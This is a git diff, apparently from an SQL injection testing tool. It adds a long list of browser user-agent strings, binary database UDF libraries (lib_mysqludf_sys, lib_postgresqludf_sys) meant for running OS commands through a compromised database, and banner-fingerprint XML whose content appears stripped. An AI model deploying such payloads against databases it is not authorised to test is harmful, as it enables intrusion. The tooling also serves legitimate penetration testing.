OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Ddg/18.6 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 
Safari/605.1.15 Ddg/18.6 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15 +Mozilla/5.0 (Macintosh; Intel Mac OS X 15_4 ADSSO) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 Unique/97.7.7239.70 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 
(KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-1) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-2) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 YaBrowser/25.6.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.104 ADG/11.1.4905 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.96 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Avast/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 AVG/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 Herring/90.1.1459.6 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Norton/139.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 OpenWave/96.4.8983.84 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.5 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.16 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 +Mozilla/5.0 
(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4482.0 Safari/537.36 Edg/92.0.874.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0 +Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 +Mozilla/5.0 (X11; CrOS x86_64 13904.97.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.167 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/116.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, 
like Gecko) Chrome/131.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/28.0 Chrome/130.0.0.0 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0 +Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 +Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0 +Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 +Mozilla/5.0 (X11; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0 diff --git a/data/txt/wordlist.tx_ b/data/txt/wordlist.tx_ new file mode 100644 index 00000000000..f2b52c90658 Binary files /dev/null and b/data/txt/wordlist.tx_ differ diff --git a/udf/README.txt b/data/udf/README.txt similarity index 100% rename from udf/README.txt rename to data/udf/README.txt diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ new file mode 100644 index 00000000000..c5339680c1b Binary files /dev/null and b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ new file mode 100644 index 00000000000..aed988c71eb Binary files /dev/null and b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ differ diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ new file mode 100644 index 00000000000..8c09c2a49ba Binary files /dev/null and b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ differ diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ new file mode 100644 index 00000000000..1e29a745889 Binary files /dev/null and b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ differ diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..2227f89936f Binary files /dev/null and b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..7ece1b633c9 Binary files /dev/null and b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..6816064fa49 Binary files /dev/null and b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ differ diff --git 
a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..0e79dbb195a Binary files /dev/null and b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..bb2aaf8ba91 Binary files /dev/null and b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..506b0eb3567 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..ef49da86edc Binary files /dev/null and b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..a1ca1cc710b Binary files /dev/null and b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..0d2f0bc0a53 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..147d8db3b19 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..09662d8a928 Binary files /dev/null and b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..42a0c7fd61f Binary files /dev/null and b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..2db1ade11d5 Binary files /dev/null and b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..1609227d01a Binary files /dev/null and b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..36db3b0eff7 Binary files /dev/null and b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..7e8760c7e36 Binary files /dev/null and 
b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..044e0976c44 Binary files /dev/null and b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..d3866e04c93 Binary files /dev/null and b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..4c957014480 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..dd637decae2 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..d92cbd30edc Binary files /dev/null and b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..38562790479 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..b72a328525b Binary files /dev/null and b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..214272877c7 Binary files /dev/null and b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ new file mode 100644 index 00000000000..b7221fd873a Binary files /dev/null and b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ differ diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..d7e0c8a46a5 Binary files /dev/null and b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..e8b109791c2 Binary files /dev/null and b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..2748ae32c81 Binary files /dev/null and b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ differ diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ 
b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ new file mode 100644 index 00000000000..60c9971218f Binary files /dev/null and b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ differ diff --git a/data/xml/banner/generic.xml b/data/xml/banner/generic.xml new file mode 100644 index 00000000000..6bd38d6b4c7 --- /dev/null +++ b/data/xml/banner/generic.xml @@ -0,0 +1,216 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/mssql.xml b/data/xml/banner/mssql.xml similarity index 100% rename from xml/banner/mssql.xml rename to data/xml/banner/mssql.xml diff --git a/data/xml/banner/mysql.xml b/data/xml/banner/mysql.xml new file mode 100644 index 00000000000..456c9510b82 --- /dev/null +++ b/data/xml/banner/mysql.xml @@ -0,0 +1,79 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/xml/banner/oracle.xml b/data/xml/banner/oracle.xml similarity index 100% rename from xml/banner/oracle.xml rename to data/xml/banner/oracle.xml diff --git a/data/xml/banner/postgresql.xml b/data/xml/banner/postgresql.xml new file mode 100644 index 00000000000..7f03e8e8c4a --- /dev/null +++ b/data/xml/banner/postgresql.xml @@ -0,0 +1,16 @@ + + + + + + + + + + + + + + + + diff --git a/xml/banner/server.xml b/data/xml/banner/server.xml similarity index 67% rename from xml/banner/server.xml rename to data/xml/banner/server.xml index cd64d8b8ab1..4d99cade0bd 100644 --- a/xml/banner/server.xml +++ b/data/xml/banner/server.xml @@ -2,28 +2,35 @@ + + + + + + + + - + - + - + - + @@ -67,19 +74,31 @@ - + - + - + - + + + + + + + + + + + + + @@ -120,24 +139,36 @@ - - + + - - + + - - + + - - + + - - + + + + + + + + + + + + + + @@ -230,98 +261,199 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ -430,10 +562,6 @@ - - - - @@ -504,6 +632,14 @@ + + + + + + + + @@ -611,6 +747,34 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + @@ 